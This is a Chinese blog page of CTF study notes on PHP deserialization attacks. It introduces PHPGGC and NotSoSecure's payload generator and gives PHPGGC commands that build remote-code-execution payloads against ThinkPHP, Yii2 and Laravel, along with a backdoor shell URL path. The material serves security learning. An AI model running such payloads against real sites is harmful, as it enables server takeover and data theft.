当前位置: 首页 > news >正文

PHP 反序列化CLI 框架类PHPGGC 生成器TPYiiLaravel 等利用

# 反序列化链项目 -PHPGGC&NotSoSecure
-NotSoSecure
https://github.com/NotSoSecure/SerializedPayloadGenerator
为了利用反序列化漏洞,需要设置不同的工具,如 YSoSerial(Java)
YSoSerial.NET PHPGGC 和它的先决条件。 DeserializationHelper 是包含对
YSoSerial(Java) YSoSerial.Net PHPGGC 和其他工具的支持的 Web 界面。使
Web 界面,您可以为各种框架生成反序列化 payload.
Java – YSoSerial
NET – YSoSerial.NET
PHP – PHPGGC
Python - 原生
-PHPGGC
https://github.com/ambionics/phpggc
PHPGGC 是一个包含 unserialize() 有效载荷的库以及一个从命令行或以编程方式生成
它们的工具。当在您没有代码的网站上遇到反序列化时,或者只是在尝试构建漏洞时,此
工具允许您生成有效负载,而无需执行查找小工具并将它们组合的繁琐步骤。 它可以看
作是 frohoff ysoserial 的等价物,但是对于 PHP 。 目前该工具支持的小工具链
包括: CodeIgniter4 Doctrine Drupal7 Guzzle Laravel Magento
Monolog Phalcon Podio ThinkPHP Slim SwiftMailer Symfony
Wordpress Yii ZendFramework 等。
# 反序列化框架利用 -ThinkPHP&Yii&Laravel
[ 安洵杯 2019]iamthinking Thinkphp V6.0.X 反序列化
./phpggc ThinkPHP/RCE4 system 'cat /flag' --url
CTFSHOW 反序列化 267 Yii2 反序列化
弱口令登录 / 源码提示泄漏
GET index.php?r=site%2Fabout&view-source
GET /index.php?r=backdoor/shell&code=
./phpggc Yii2/RCE1 exec 'cp /fla* tt.txt' --base64
CTFSHOW 反序列化 271 Laravel 反序列化
./phpggc Laravel/RCE2 system "id" --url
#Thinkphp 反序列化链分析
Thinkphp-All-vuln-main
http://www.dtcms.com/a/150646.html

相关文章:

  • 设计模式之策略模式
  • nginx实现同一个端口监听多个服务
  • 用Python爬取B站热门视频并自动保存到本地
  • Java多线程的暗号密码:5分钟掌握wait/notify
  • AutoGPT超详细教程
  • 服务器数据恢复—双循环RAID5数据恢复揭秘
  • Java Web容器分类及对比
  • BSTREE(二叉搜索树)的介绍与模拟实现
  • 【Nova UI】八、打造组件库第一个组件-图标组件(上):图标组件开发实战攻略
  • 【Java后端】MyBatis 与 MyBatis-Plus 如何防止 SQL 注入?从原理到实战
  • 锁存器知识点详解
  • Java基础第21天-正则表达式
  • Redis高频核心面试题
  • 网络安全职业技能大赛Server2003
  • ECharts 关系图表开发指南与 Vue3 组件封装
  • 杂谈-有感而发
  • LOAM的原理分析,源码解读,和运行调试
  • 接口测试和功能测试详解
  • SQL Server 2022 常见问题解答:从安装到优化的全场景指南
  • 使用 JUnit 4在 Spring 中进行单元测试的完整步骤
  • Pingora vs. Nginx vs. 其他主流代理服务器性能对比
  • Python 的 datetime 模块使用详解
  • 【Linux】详细介绍进程的概念
  • 小白自学python第一天
  • Fabric.js 设置画布背景
  • AI在Java语言的发展方向与涉及领域——一场深度的求职面试
  • Spring AI - Redis缓存对话
  • 基于Flask与Ngrok实现Pycharm本地项目公网访问:从零部署
  • 开源模型应用落地-语音合成-Spark-TTS-零样本克隆与多语言生成的突破
  • 浏览器相关知识点